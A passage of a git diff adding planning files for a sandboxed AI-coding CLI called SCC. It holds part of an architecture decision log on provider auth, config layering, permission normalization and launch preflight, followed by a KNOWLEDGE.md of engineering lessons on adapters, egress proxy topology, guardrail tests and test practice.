neutrality) without solving a current user problem. | Yes | collaborative | +| D037 | M007-cqttot planning refinement | architecture | How should SCC handle auth readiness checking and future auth commands for Codex? | M007 adds auth readiness checking to doctor via a provider-owned auth_check() method on AgentProvider. For Claude, this checks for OAuth credentials in the data volume. For Codex, this checks for auth.json in the data volume. Both return a structured AuthReadiness(ready: bool, mechanism: str, guidance: str). Future scc auth login/status/logout commands are deferred but the model is designed so they compose naturally: scc auth login would open the provider's auth flow, scc auth status would call auth_check(), scc auth logout would clear the auth cache in the volume. Provider auth handling remains adapter-owned — shared core never hardcodes auth file names or assumes one auth model. | Doctor already checks image readiness; adding auth readiness is the natural next step and directly improves operator UX. Making it adapter-owned (via AgentProvider) means each provider can implement its own mechanism without core coupling. The AuthReadiness return type is simple enough to design now and enables future scc auth commands without restructuring. Full auth commands (login/status/logout) are out of M007 scope but the model should make them cheap to add later. | Yes | collaborative | +| D038 | M007-cqttot planning refinement | architecture | How should SCC ensure managed provider config does not leak between launches? | On every fresh launch (not resume), SCC deterministically writes the SCC-managed settings file to the container — even when logically empty (writes an empty/default config). This ensures no stale team-specific or workspace-specific config persists from a prior launch. On resume, the existing config is left in place (it belongs to the session being resumed). The OCI runtime's _inject_settings path is split into: (1) clear-or-overwrite-settings always on fresh launch, (2) inject only on resume if new settings are provided. A sentinel comment or key in the written file identifies it as SCC-managed so future diagnostics can distinguish SCC-injected config from user-edited config. | The provider config volume persists between container lifetimes. If SCC injects team A's settings on launch 1 and then launches standalone (no team) on launch 2, the old team A settings file remains in the volume and the agent reads stale config. Writing even when empty is cheaper and more reliable than conditional clearing — it avoids the need to enumerate all possible stale files. Resume is the exception because the session context should match what was originally launched with. | Yes | collaborative | +| D039 | M007-cqttot planning refinement | architecture | How should provider state volume permissions be enforced at runtime? | Add a runtime permission normalization step to the OCI launch path, executed after container creation and before settings injection. The normalization runs `docker exec` to: (1) set the provider config dir to 0700 owned by uid 1000, (2) set known auth files (if present) to 0600 owned by uid 1000. This runs on every fresh launch. Build-time permissions in the Dockerfile serve as the initial state for empty volumes; runtime normalization handles volumes that already have data with incorrect permissions (e.g. from manual intervention or Docker volume driver quirks). | Docker named volumes that already contain data from a previous container lifecycle may have incorrect ownership or permissions — the volume content is not reset by the Dockerfile's RUN commands. Build-time permissions only apply when the volume is first populated. Runtime normalization is the defense-in-depth layer that ensures auth files are never world-readable regardless of volume history. | Yes | collaborative | +| D040 | M007-cqttot planning refinement | architecture | How should Codex auth storage be configured in SCC containers? | SCC injects `cli_auth_credentials_store = "file"` into the Codex config.toml written at launch time. This forces file-based auth caching (auth.json) instead of keyring/auto detection. The auth.json file lives in the persistent provider volume (/home/agent/.codex/auth.json) so users log in once and reuse the token cache until expiry. Refreshed tokens persist back to the same file in the volume. SCC does not manage the auth flow itself — Codex handles login/refresh natively. SCC only ensures the storage mode is file-based and the file is persisted. | Inside Docker containers, OS keyring is unreliable or unavailable. Codex's auto-detection mode may attempt keyring and fail silently or prompt unexpectedly. Forcing file-based auth is the only reliable container path. The auth.json file in the volume survives container restarts, so users don't re-login every launch. This is the same model Claude uses with its credentials files in the data volume. | Yes | collaborative | +| D041 | M007-cqttot planning refinement | architecture | How should SCC manage provider config without overwriting user/provider-owned preferences? | SCC uses provider-native config layering to write SCC-managed settings to a scope that takes precedence over user config but does not overwrite user-owned files. For Claude, SCC writes to /home/agent/.claude/settings.json (an SCC-owned injection surface) — this is already separate from settings.local.json (user-owned) and the Claude runtime merges both. For Codex, SCC writes to a project-scoped .codex/config.toml inside the workspace mount (/workspace/.codex/config.toml) — Codex's config precedence puts project config above user config, so SCC-managed values (MCP servers, sandbox bypass, auth storage mode) override user defaults without destroying them. The user-level ~/.codex/config.toml in the persistent volume stays untouched and retains model preferences, feature flags, agent definitions, and other user settings. On fresh launch, SCC writes the project-scoped config deterministically (D038); on resume, it is left in place. Auth storage (cli_auth_credentials_store='file') is injected via the project config, not the user config. | Both Claude and Codex natively support layered config with clear precedence (project > user > system > defaults). SCC should use this layering rather than fight it. Overwriting the user-level config.toml would destroy model preferences, agent definitions, feature flags, and sandbox policies — the exact concern raised. Project-scoped config is the right injection point because: (1) it takes precedence per Codex's own resolution order, (2) it lives in the workspace mount which SCC already controls, (3) it is naturally ephemeral per workspace, (4) Codex only loads it when the project is trusted (and SCC can ensure trust via launch flags). For Claude, the existing settings.json injection is already the correct pattern — it was always separate from the user-owned file. | Yes | collaborative | +| D042 | M007-cqttot planning refinement | architecture | Refinement of D038: what exactly does SCC write on fresh launch for config freshness? | On every fresh launch, SCC writes the SCC-managed config file deterministically, even when logically empty. For Claude: writes /home/agent/.claude/settings.json (already the pattern). For Codex: writes /workspace/.codex/config.toml with SCC-managed values (cli_auth_credentials_store, sandbox/approval overrides, MCP servers from governed bundles). These are provider-native injection surfaces that do NOT overwrite user-level config in the persistent volume. On resume, SCC leaves existing config in place. The fresh-launch write is scoped to SCC-owned config layers only — user/provider preferences in the persistent volume are never modified. | D038 as originally stated ('write the authoritative settings file on every fresh launch') was ambiguous about which file was being written. With D041 establishing that SCC uses provider-native layering (project-scoped for Codex, settings.json for Claude), D038's freshness guarantee becomes precise: SCC deterministically writes its own layer, not the user's config. This preserves user preferences while guaranteeing no stale team/workspace config leaks. | Yes | collaborative | +| D043 | M007-cqttot/S01/T02 | architecture | Where does provider_registry.py actually live after the no-root-sprawl guardrail? | Moved provider_registry.py from package root (D034's plan) to src/scc_cli/core/provider_registry.py. The no-root-sprawl guardrail test (test_no_root_sprawl.py) rejects new top-level modules. core/ is acceptable because the module imports only from core and does not introduce adapter or command dependencies. ProviderRuntimeSpec (the type) and PROVIDER_REGISTRY (the dict) now colocate in core/, which simplifies imports for all consumers. | D034 placed the registry at package root alongside bootstrap.py, but the existing test_no_root_sprawl guardrail rejects new top-level .py files. Moving to core/ satisfies the guardrail while maintaining the same import accessibility — all consumers (doctor, sessions, dependencies, start_session) can import from scc_cli.core.provider_registry without layer violations. The module still only imports from core (contracts, errors, image_contracts), so it does not violate the core → adapters boundary. | Yes | agent | +| D044 | M007-cqttot/S05/T01 | roadmap | Whether M007/S05 should close as docs-only or include implementation reconciliation tasks | Expand S05 to include reconciliation tasks that implement D033, D035, D037, D038, D039, D040, D041, D042 in code and tests before milestone closeout. S05 is no longer docs/naming-only — it must verify that the M007 architecture (provider-owned settings serialization, Codex launch policy, config ownership layering, auth persistence, runtime permissions, fail-closed dispatch) is real in the codebase, not just documented in decisions and context files. | User override: the final M007 architecture and the current code are still out of sync in several important places. Decisions were recorded but not all implemented. Closing M007 as docs-only would leave the codebase misrepresenting its own architecture — the exact kind of truthfulness gap M007 was supposed to eliminate. The 11 reconciliation items cover: provider-owned settings serialization (D035), Codex launch argv (D033), config ownership layering (D041), file-based Codex auth (D040), config freshness (D038/D042), runtime permission normalization (D039), adapter-owned auth readiness (D037), Claude fallback removal (D032), and image hardening. | No — user directed | human | +| D045 | M008-g7jk8d planning | branding | Whether M008 should change product name in .scc.yaml and other surfaces | Preserve 'Sandboxed Coding CLI' per D045. Do not revert to 'Sandboxed Code CLI' (D030 was superseded). M008 must verify and guard branding consistency, not introduce drift. | D045 supersedes D030 and establishes 'Sandboxed Coding CLI' as canonical. The live codebase (branding.py, theme.py, cli.py, setup_ui.py, errors.py, init.py, README, pyproject.toml) already uses this consistently. Reverting would reintroduce the exact naming confusion M007 was supposed to eliminate. | No — user directed | human | +| D046 | M008-g7jk8d planning | architecture | Architecture constraints for the shared launch preflight module (commands/launch/preflight.py) | The preflight module must: (1) stay command-layer only — no placement in core/ or application/, (2) not leak provider-specific behavior into core contracts — it dispatches to existing provider_image.py and auth_bootstrap.py, (3) not own UI wording beyond structured error messages (user_message, suggested_action) — callers own rendering, (4) separate pure decision logic (resolve_launch_provider, collect_launch_readiness) from side effects (ensure_launch_ready) so the decision functions are independently testable without mocking I/O. | The preflight module consolidates orchestration that is currently duplicated five times across command and UI layers. Keeping it command-layer prevents core from growing execution concerns. Separating pure decisions from side effects prevents it from becoming a god-function — the pure functions can be tested with plain data, the side-effect function is thin. Not owning UI wording keeps the module reusable across interactive (console) and non-interactive (JSON error) contexts. | Yes | collaborative | +| D047 | M008-g7jk8d planning refinement | architecture | Whether LaunchReadiness should use enums or loose booleans/strings for readiness state | Use frozen dataclass with enum fields: ImageStatus, AuthStatus, ProviderResolutionSource. Derived booleans (requires_image_bootstrap, requires_auth_bootstrap, launch_ready) are computed from enum values, not independent flags. Callers pattern-match on enum values, not string comparisons or bool combos. | The shared preflight module consolidates logic from five sites. Without typed enums, the consolidated readiness state would become ad hoc branching glue — callers comparing strings like 'present' or checking combos of loose booleans. Enums make the state space explicit and exhaustible. The derived booleans are convenience accessors for the common 'do I need to bootstrap?' check, not independent state. | Yes | collaborative | +| D048 | M008-g7jk8d/S01/T03 | architecture | Whether flow.py start() should use ensure_launch_ready() or keep ensure_provider_image/ensure_provider_auth inline | Keep ensure_provider_image/ensure_provider_auth inline in flow.py start() because the auth bootstrap path needs StartSessionPlan context (artifact_paths, provider-specific config) that is not available until after prepare_live_start_plan(). Only provider resolution was migrated to the shared preflight module. | The start() flow resolves the provider first (shared preflight), then builds StartSessionPlan, then uses plan-dependent data for image and auth bootstrap. ensure_launch_ready() cannot receive plan context because it runs before plan construction. This is a legitimate ordering constraint, not laziness — the image/auth bootstrap steps will consolidate when the plan-before-bootstrap ordering is refactored in a future slice. | Yes | agent | +| D049 | M009-xwi4bt/S01/T02 | architecture | Whether D048 (keeping ensure_provider_image/ensure_provider_auth inline in flow.py) still holds after M009/S01/T02 migration | D048 is superseded. flow.py start() now uses collect_launch_readiness() + ensure_launch_ready() from the shared preflight module, placed after provider resolution but before plan construction. The ordering constraint that D048 cited (auth bootstrap needs StartSessionPlan context) was dissolved — ensure_launch_ready() only needs the provider adapter and readiness status, both available before plan construction. Resume and dry-run paths skip readiness entirely. All five launch sites now use the same shared preflight path. | T02 completed the migration of flow.py and flow_interactive.py to shared preflight, proving the ordering constraint in D048 was narrower than assumed. The auth bootstrap only needs provider_id and the adapter's bootstrap_auth() method — not the full StartSessionPlan. Moving readiness before plan construction is strictly better: it fails faster and avoids unnecessary plan construction when the provider isn't ready. | Yes | agent | diff --git a/.gsd/KNOWLEDGE.md b/.gsd/KNOWLEDGE.md new file mode 100644 index 0000000..7df1e72 --- /dev/null +++ b/.gsd/KNOWLEDGE.md @@ -0,0 +1,100 @@ +# KNOWLEDGE.md + +## Stable rules and lessons +- Provider-core destinations must be validated before launch. Do not make users discover missing provider access at runtime. +- GitHub/npm/PyPI are not provider-core. They are optional named destination sets. +- Network-tool wrappers are defense-in-depth in enforced modes. Topology plus proxy policy remain the hard egress control. +- Runtime wrappers are the cross-provider baseline. Claude hooks and Codex-native features are UX layers. +- Do not introduce provider-specific fields into core contracts just because one adapter needs them today. +- Typed contracts are part of maintainability, not polish. +- Do not rename controls in a way that sounds stronger than the actual enforcement. +- Keep Beads and `.gsd/` state rooted in the synced repo only. +- When a worktree branch predates a milestone that landed new contracts, port the contracts upfront in T01 rather than mid-migration; a half-ported enum vocabulary breaks imports immediately and causes cascading test failures that obscure the actual migration work. +- `xfail(strict=True)` is the right mechanism for seam-boundary tests: it gates mechanically (suite fails if behavior arrives but decorator is not removed), documents intent as code, and converts to a passing test with just a decorator removal — no logic change needed. +- `AgentLaunchSpec.env` should remain empty for providers whose configuration is file-based (e.g. Claude settings.json). Put artifact references in `artifact_paths`. Injecting provider config as env vars couples the runtime layer to provider-specific encoding schemes. +- When adding a new field to a shared dataclass (`StartSessionDependencies`, `DefaultAdapters`), grep for all construction sites — `tests/fakes/__init__.py:build_fake_adapters()` is the test factory, but inline `DefaultAdapters()` and `StartSessionDependencies()` calls also exist in test files and will break silently without a `None` default guard. +- The M002 worktree branch diverged from main before M001 landed. For future milestone worktrees created early, always rebase or cherry-pick core contract files before starting T01; otherwise T01 spends half its budget on vocabulary alignment rather than new work. +- `bootstrap.py` is the composition root for the adapter layer. Application and command layers (`application/`, `commands/`) must not import directly from `scc_cli.adapters.*`; any adapter symbols they need must be re-exported via `bootstrap.py`. The test `test_only_bootstrap_imports_adapters` enforces this mechanically — if you move an adapter symbol and its callers import it directly, that test will fail. Add a re-export line with `# noqa: F401` to `bootstrap.py` to satisfy both the import boundary and ruff's unused-import check. +- The canonical 4-test shape for any new `AgentProvider` adapter: (1) `test_capability_profile_returns__metadata`, (2) `test_prepare_launch_without_settings_produces_clean_spec`, (3) `test_prepare_launch_with_settings_includes_artifact_path`, (4) `test_prepare_launch_env_is_clean_str_to_str`. Follow this shape for every new adapter — it covers the D003 contract guard and the core seam contracts in minimal surface area. +- Adding a second `AgentProvider` to `DefaultAdapters` requires exactly 4 touches: (1) new adapter file in `src/scc_cli/adapters/`, (2) import + field (with `| None = None` default) + instantiation in `bootstrap.py`, (3) `FakeAgentProvider()` in `tests/fakes/__init__.py:build_fake_adapters()`, (4) `FakeAgentProvider()` in any inline `DefaultAdapters(...)` constructions in test files. The `None` default in step 2 is the safety net if a future construction site is missed. +- When a slice touches an oversized or high-churn file, the default expectation is to leave behind a smaller seam or helper module if it can be done without broadening risk. "Make it work" is not sufficient if the touched area becomes harder to reason about. +- Prefer behavior-preserving extractions with characterization tests over speculative framework rewrites. Maintainability work should reduce local complexity and import leakage, not add abstraction layers with no clear owner. +- Keep composition roots and orchestration edges easy to inspect. If wiring becomes hard to trace in `bootstrap.py`, launch flows, or dashboard orchestration, extract explicit helpers rather than burying decisions in implicit globals or convenience wrappers. +- In `.gsd/worktrees/*`, pin focused pytest runs to the worktree root with `uv run pytest --rootdir "$PWD" ./tests/...`. A `./tests/...` prefix helps, but some runners still resolve `rootdir` against the synced repo; forcing `--rootdir "$PWD"` avoids false "file not found" failures against worktree-only test files. +- Worktree auto-start must reuse the same `finalize_launch(...)` boundary as `scc start` and carry the current `selected_profile` into `StartSessionRequest`; if it launches with `team=None`, provider preflight silently falls back to open-network semantics and bypasses org-policy validation plus durable launch audit. +- When exposing diagnostics for an append-only audit sink, add a bounded redaction-safe reader over the canonical sink instead of inventing a parallel persistence format or shipping raw log dumps. That keeps operator surfaces cheap, testable, and aligned with the real source of truth. +- If support or troubleshooting flows exist in both CLI and UI/settings paths, converge them on one application-owned use case before adding new features. Duplicated diagnostic helpers drift quickly on redaction, manifest shape, and default-path behavior. +- For milestone closeout, trust only a fresh rerun of the exact exit gate from the active worktree plus a rendered validation artifact. Older green slice summaries are supporting evidence, not the final proof. +- When writing guardrail tests that scan source for deprecated call-site references, use Python's `tokenize` module rather than regex. Regex falsely flags docstrings, comments, and string literals; tokenize correctly isolates NAME tokens and avoids false positives. See `tests/test_runtime_detection_hotspots.py` for the pattern. +- When mocking re-exported names (e.g. `from scc_cli.docker import check_docker_installed` used in an adapter), patch the name in the *consumer's* module namespace (`scc_cli.adapters.docker_runtime_probe.check_docker_installed`), not in the definition site (`scc_cli.docker.core`). Python binds the name at import time, so patching the original location has no effect on already-imported references. +- The OCI adapter uses `sleep infinity` as the container entrypoint so the container stays alive for `docker exec`. The agent process is launched via `os.execvp("docker", ["docker", "exec", ...])` which replaces the SCC process entirely. This is intentionally different from the Desktop sandbox adapter which uses `docker sandbox run` as an all-in-one command. +- When `bootstrap.py` probes the runtime at construction time to select adapters (e.g. OciSandboxRuntime vs DockerSandboxRuntime), environment-dependent tests that call `get_default_adapters()` must accept multiple valid adapter types or mock the probe. Hard-coding a single concrete type assertion will fail on environments where the probe returns a different `preferred_backend`. Use `isinstance(runtime, (DockerSandboxRuntime, OciSandboxRuntime))` or mock the probe to control the result. +- For the OCI adapter, centralize all `subprocess.run` calls behind a `_run_docker` helper with per-command timeouts and automatic `SandboxLaunchError` wrapping. This avoids scattered `try/except` blocks and ensures consistent error metadata (command, stderr, exit code) in diagnostics. The `status()` method is the exception — it returns `SandboxState.UNKNOWN` on any failure instead of raising, since callers expect a value not an exception. +- The enforced web-egress topology uses a dual-homed Squid proxy sidecar: the proxy container is attached to both the internal-only network (where the agent lives) and the default bridge (for external access). The agent container is attached only to the internal network and can only reach the outside through the proxy. This is the hard enforcement boundary — even if the agent ignores HTTP_PROXY env vars, it physically cannot bypass the proxy because Docker's `--internal` flag blocks direct external connectivity. `egress_topology.py` has its own `_run_docker` helper to avoid coupling with `oci_sandbox_runtime.py`; both follow the same SandboxLaunchError wrapping pattern independently. +- When testing topology management code that orchestrates multiple Docker subprocess calls (network create, container run, network connect, inspect), mock each call at the subprocess.run level and use `call_args_list` ordering assertions to verify the setup sequence. The proxy IP extraction specifically needs a mock return for `docker inspect --format` with the internal network's IP. Use a separate mock side-effect function to route different docker subcommands to different return values. +- When support-bundle or diagnostic sections aggregate data from multiple independent sources (runtime probe, config store, registry lookup), wrap each source in its own try/except and populate partial results rather than letting one failure cascade. This keeps operator bundles useful even when one subsystem is broken — the exact scenario where the bundle is most needed. +- Doctor checks that need adapter access (e.g. runtime probe) should go through `bootstrap.get_default_adapters()` rather than importing adapter classes directly. This respects the `test_only_bootstrap_imports_adapters` guardrail and keeps doctor checks testable by mocking at the bootstrap boundary. +- When building a multi-layer enforcement system (like egress), keep each layer independently testable: pure policy logic as plain functions (core/egress_policy.py), infrastructure management as a separate adapter (adapters/egress_topology.py), and orchestration in the existing runtime adapter (adapters/oci_sandbox_runtime.py). This enabled 49 new tests without requiring Docker. +- For docs truthfulness guardrails, regex scanning is sufficient for string-literal and prose content; reserve the tokenize module for Python identifier scanning. The dual scanning strategy (tokenize in test_runtime_detection_hotspots.py, regex in test_docs_truthfulness.py) keeps guardrails precise without over-engineering. +- Provider destination registries should start as plain typed dicts, not frameworks. The `core/destination_registry.py` module is 18 statements with 17 tests because the implementation is trivial by design. Extensibility comes from adding entries to the dict, not from plugin machinery. +- Milestone-level success criteria should be formally populated during planning, not compensated at validation time by aggregating slice-level criteria. M003 validation worked but required more effort than necessary because milestone-level criteria were empty strings in the DB. +- Container images defined as Dockerfiles without a build/push pipeline create a gap between tested code and operational readiness. The images/ directory in M003 is design-only; future milestones should include image distribution strategy alongside Dockerfile definitions. +- When a frozen dataclass needs a new field that carries typed objects from another module, use a `TYPE_CHECKING` guard for the import and set the default to an empty tuple (not None) to avoid circular imports while preserving type safety. See `SandboxSpec.destination_sets` in `ports/models.py` for the pattern. +- When lifting safety-critical parsing logic from an existing plugin into core, copy the module verbatim first, then adapt only the return types (e.g. raw strings → typed SafetyVerdict). This preserves the battle-tested parsing logic and lets you diff the adapted file against the plugin original to confirm behavioral equivalence. The adapted test suite serves as a characterization test: if the same inputs produce structurally equivalent outputs (modulo the new verdict wrapper), the lift is correct. See `core/git_safety_rules.py` (lifted from `scc_safety_impl/git_rules.py`) and `core/shell_tokenizer.py` (lifted from `scc_safety_impl/shell.py`). +- When adding a new protocol-typed field to `DefaultAdapters` (like `safety_engine: SafetyEngine | None = None`), use `| None = None` as the default to avoid breaking existing construction sites. The `None` default is a safety net — callers that don't know about the new field keep working. The canonical construction in `get_default_adapters()` fills the real value. See D016 and the `safety_engine` field pattern in `bootstrap.py`. +- When forking safety-critical modules from core into a standalone package (e.g. `scc_safety_eval`), keep a sync-guardrail test that normalizes import lines and diffs core↔copy. The test in `tests/test_safety_eval_sync.py` catches accidental drift when someone edits core logic without updating the evaluator copy. This is cheaper than a shared build artifact and more reliable than documentation. +- The standalone evaluator package at `images/scc-base/wrappers/scc_safety_eval/` uses ruff per-file-ignores for T201 (print statements) because stderr printing is the evaluator's sole output mechanism — there is no logging framework in the stdlib-only package. See `pyproject.toml` `[tool.ruff.lint.per-file-ignores]`. +- Shell wrappers in `images/scc-base/wrappers/bin/` use absolute `REAL_BIN=/usr/bin/` paths to prevent self-recursion when the wrapper directory is first in PATH. The `basename "$0"` gives the tool name for the evaluator. Integration tests verify these structural properties without requiring Docker. +- The current marketplace/settings pipeline is still Claude-shaped (`settings.local.json`, `.claude-plugin/marketplace.json`, `claude-plugins-official`). Future Codex work should generalize around provider-neutral governed artifacts and bundles, not extend Claude plugin references into new core contracts. +- Treat a plugin as a distribution bundle, not as the canonical policy object. Org/team policy should select approved bundles once; adapters then render Claude or Codex native assets from the same effective plan. +- When provider parity is incomplete, apply the shared parts (skills, MCP definitions) and report skipped provider-native bindings explicitly. Truthful degradation is better than shadow compatibility layers. +- Codex plugins, Codex rules, Codex hooks, AGENTS layering, Claude plugins, Claude hooks, and `CLAUDE.md` guidance are separate native surfaces with different semantics. SCC should unify them at the approval/bundle level, not by pretending they share a single on-disk format. +- Codex plugin parity does not mean "put everything in a Codex plugin." Codex rules, hooks, `config.toml`, marketplace catalogs, and `AGENTS.md` layering live outside the plugin bundle and should be rendered as adjacent native surfaces when required by policy. +- Codex rules and hook interception are useful native guardrails, but they are not the hard enforcement boundary. Keep hard-control claims on SCC-owned runtime wrappers, topology, and proxy policy. +- The cleanest enterprise UX is "one approved team pack," but that pack should be sourced from a provider-neutral SCC bundle repo or registry. Provider-native marketplaces and plugin folders should be generated outputs, not the canonical authoring surface. +- Prefer skills over `AGENTS.md` or `CLAUDE.md` for reusable team workflows. Use native instruction files only when the behavior must be always-on and high-precedence. +- `NormalizedOrgConfig` now covers `security.safety_net`, `stats`, and `config_source` (added M005/S03/T02). Code that needs raw org config fields not modeled in the normalized type (e.g. doctor checks) must use the raw `config.load_cached_org_config()` dict. Use a `_load_raw_org_config()` private indirection for clean mock patching in tests. +- `NormalizedOrgConfig.from_dict()` uses `importlib.import_module` to call `normalize_org_config()` — this avoids a static ports→adapters import that violates the architectural boundary enforced by `test_import_boundaries.py`'s grep-based check. +- When adding audit reader commands to the CLI, follow the exact pattern of the existing `support_launch_audit_cmd`: same `--limit`/`--json`/`--pretty` option set, same human vs JSON mode branching, same bounded tail-read from the canonical JSONL sink. The pattern reuse keeps CLI surfaces consistent and reduces review surface for new diagnostic commands. +- When decomposing an oversized module, keep the original file as a thin residual that re-exports all extracted symbols with `# noqa: F401`. This preserves all existing import paths without a mass find-and-replace, and downstream consumers don't need coordinated updates. The residual should contain only orchestration/glue logic that ties the extracted pieces together. +- When an extracted function would create a cross-layer boundary violation (e.g. core importing from marketplace), replace the violating import with a `Callable` parameter and pass the concrete implementation from the call site in the correct layer. This is cheaper than introducing a new protocol/interface for a single function reference. +- When extracting methods that are existing mock targets in tests, use a late-bound module lookup pattern (e.g. `_get_module()` or deferred import) so that tests patching the original module path (`scc_cli.ui.wizard.pick_team_repo`) still work even though the function now lives in `scc_cli.ui.wizard_pickers.pick_team_repo`. The re-export + late-bound lookup combination avoids cascading test updates. +- When two extracted modules would create a circular import at module level, use function-level (deferred) imports. This is common when splitting orchestration logic from its helpers — the orchestration module imports helper types, and the helper module needs orchestration functions for delegation. See `flow_session.py` ↔ `flow_interactive.py`. +- Infrastructure modules (docker/, marketplace/) should not import from presentation modules (console, UI). Replace direct console output calls with `logging.warning()` or `logging.getLogger(__name__).warning()`. The presentation layer can attach appropriate log handlers if needed. +- When converting dict[str, Any] config access to frozen dataclass models, boolean fields that need "not set" vs "explicitly False" semantics must use `bool | None = None`, not `bool = False`. The original dict code distinguishes absent keys (`.get()` returns `None`) from explicit `False` values, which is critical for override-chain semantics (e.g., team overriding org defaults). SessionSettings.auto_resume was changed from `bool = False` to `bool | None = None` for this reason. +- When replacing `dict | None` with a typed model at call boundaries, use `is not None` guards rather than truthiness (`if raw_dict`). Empty dicts `{}` are falsy but semantically meaningful — `config.load_cached_org_config()` returns `{}` to indicate "org config exists but is empty", which differs from `None` (no config at all). Truthiness-based guards silently convert `{}` to `None`, breaking downstream code that distinguishes the two cases (e.g., preflight checks that trigger when an org config exists). +- Provider renderers must return fragment dicts (`settings_fragment` for Claude, `mcp_fragment` for Codex) for caller-owned merge into provider config files — they must NOT write shared files (settings.local.json, .mcp.json) directly. This enables the launch pipeline to control merge ordering, conflict detection, and rollback without renderer coupling. The unified `RenderArtifactsResult` in `core/contracts.py` maps both fragment types into a single `settings_fragment` field. +- Renderer binding classification uses a heuristic (`_classify_binding`) keyed on `artifact_kind` + `native_ref` patterns rather than an explicit `kind` tag in the binding data. This is intentional — governed-artifact bindings carry metadata from diverse sources (skills, MCP, hooks, plugins, rules, instructions) and adding a discriminant tag would couple the core model to provider-specific rendering concerns. If classification breaks, check the heuristic in the renderer, not the binding model. +- Bundle resolver `fail_closed` mode is opt-in (default `False`) for backward compatibility. The launch pipeline passes `fail_closed=True` for resolution; renderer errors are captured as diagnostics on `StartSessionPlan.bundle_render_error` rather than raised to the caller. This lets the launch flow continue with partial rendering while still recording the failure for support bundles and doctor checks. +- Provider-native file surfaces use `.scc-managed/` subdirectories under each provider's config root (`.claude/.scc-managed/`, `.codex/.scc-managed/`) to avoid collisions with user-authored files. Hooks merge uses a `scc_managed` namespace key per bundle. This preserves user content while enabling idempotent re-rendering. +- macOS PermissionError gotcha: `path.exists()` raises PermissionError when the parent directory is locked/read-only. The Codex hooks renderer wraps the entire read-check-write cycle in a single OSError handler for this reason. Any code that does `if path.exists(): read(path)` on potentially locked filesystem paths should use a single try/except block instead. +- When running `pytest --cov` with `--cov-branch` on multiple modules simultaneously, stale `.coverage.*` data files from prior runs that mixed statement-only and branch coverage cause `DataError: Can't combine statement coverage data with branch data`. Always `rm -f .coverage .coverage.*` before combined coverage runs with branch mode enabled. +- For test files covering a module with existing tests, prefer extending the existing test file (adding new test classes) over creating a parallel `*_contracts.py` test file — unless the existing tests and new tests have fundamentally different purposes (e.g. unit vs contract tests). The T02/T03 pattern of extending `test_claude_renderer.py` (34→74 tests) and `test_codex_renderer.py` (38→86 tests) kept all renderer coverage in one place with clear class-level organization. +- When testing renderer internal helpers (like `_classify_binding`, `_render_skill_binding`, `_merge_settings_fragment`) directly, document in test class docstrings why the public API alone is insufficient — typically the public entry point short-circuits before reaching edge paths in the helper. This prevents future agents from removing "unnecessary" direct-helper tests during cleanup. +- When extracting step handlers from a large wizard/orchestrator function, use union return types (e.g. `_PickerContinue | _PickerExit`) so the caller can exhaustively pattern-match on results. This avoids the extracted function needing to know the caller's control flow (break vs continue vs return) and makes each handler independently testable. See `flow_interactive.py` for the pattern. +- Doctor checks that validate catalog integrity should check both the primary collection and any cross-reference collections. The `check_catalog_health()` early-return for empty catalogs originally only checked `catalog.artifacts` — but orphan entries in `catalog.bindings` (referencing nonexistent artifacts) would silently pass. Always guard on *all* collections that can carry referential integrity errors. +- When an architecture decision is "accepted" (D023), verify it was implemented before milestone closure — not just recorded. The resolver correctly placed portable artifacts into effective_artifacts but renderers only consumed bindings, leaving D023's stated intent unimplemented for months. User review during milestone close caught the gap. Always cross-check accepted decisions against actual code behavior. +- The PortableArtifact pattern — carrying source metadata directly on the render plan for binding-less artifacts — cleanly solved the rendering gap without requiring fake bindings, protocol extensions, or provider-specific stubs. When a type hierarchy already has the right data (GovernedArtifact has source_url, source_ref, etc.), create a lightweight projection type (PortableArtifact) and pass it alongside existing structures rather than restructuring the pipeline. +- Portable skills render to the same provider-native surface directories as binding-based skills (.claude/.scc-managed/skills/ and .agents/skills/) but with a `portable: true` marker in metadata. This enables downstream tooling to distinguish source-metadata-only artifacts from fully provider-bound artifacts without separate directory hierarchies. +- When testing typer CLI commands by calling the underlying function directly (not via CliRunner), optional parameters with `typer.Option(None, ...)` defaults are `OptionInfo` objects, not `None`. Guard with `isinstance(value, str)` before using the value. See `_resolve_provider()` in `flow.py` for the pattern. +- Provider dispatch in the launch path is request-scoped via `build_start_session_dependencies(provider_id=...)`, not baked into the `lru_cache`d `DefaultAdapters` singleton. This matches D028: shared infra (probe, engine, sink) stays cached; provider-specific adapters are selected per invocation. Use `_PROVIDER_DISPATCH` dict-lookup in `dependencies.py` to avoid if/else chains when adding providers. +- To make the OCI runtime provider-aware without leaking provider_id into the infrastructure adapter, forward provider-specific values as data fields on SandboxSpec (`agent_argv`, `data_volume`, `config_dir`). The application layer (`_build_sandbox_spec`) resolves provider_id → concrete values via dict lookups (`_PROVIDER_IMAGE_REF`, `_PROVIDER_DATA_VOLUME`, `_PROVIDER_CONFIG_DIR`). The infrastructure adapter (`oci_sandbox_runtime.py`) consumes spec fields with empty-string/empty-tuple fallbacks to existing constants. This keeps the infrastructure layer provider-agnostic — it never imports or inspects provider_id. +- Dict-based dispatch tables (`_PROVIDER_DISPATCH`, `_PROVIDER_IMAGE_REF`, `_PROVIDER_DATA_VOLUME`, `_PROVIDER_CONFIG_DIR`) scale better than if/else chains and are cheaper than frozen dataclass hierarchies for provider-specific constants. Adding a provider is one dict entry per table. Consider a ProviderRuntimeSpec dataclass only if a third provider arrives and dict proliferation becomes a maintenance burden. **Superseded by M007/S01**: ProviderRuntimeSpec and PROVIDER_REGISTRY now replace those 5 scattered dicts. Adding a provider is one ProviderRuntimeSpec entry in the registry. +- When planning to place a new module at package root (same level as bootstrap.py), check for test_no_root_sprawl guardrail first. The guardrail rejects new top-level .py files. core/ is an acceptable alternative when the module imports only from core — it preserves import accessibility without violating layering. D034 → D043 documents this specific case for provider_registry.py. +- When fixing a hardcoded provider-specific path (like settings_path), use request.provider_id from the launch request rather than querying the adapter's self-reported ID. The adapter ID comes from FakeAgentProvider in tests and may not match the intended provider. The request carries the user's intent; the adapter carries the implementation. +- Coexistence testing at the data-structure level (no Docker dependency) is fast, deterministic, and sufficient to prove identity isolation. Hash the provider_id into container names and volume names; test the hash divergence directly. +- SessionRecord schema versioning with backward-compat `from_dict()` defaults is the right pattern for session record evolution — new records get v2 fields, old records gracefully fall back without migration scripts. +- Guardrail tests for branding (scanning source tree for hardcoded provider references) catch regressions cheaply. Maintain an exclusion list for legitimate adapter-layer references to avoid false positives. +- Milestone success criteria should distinguish core deliverables (must ship) from polish items (nice to have). M006's original 24 criteria included aspirational TUI features that weren't essential to the core multi-provider runtime deliverable. Separating them earlier would have made scope clearer during execution. +- When SCC-managed 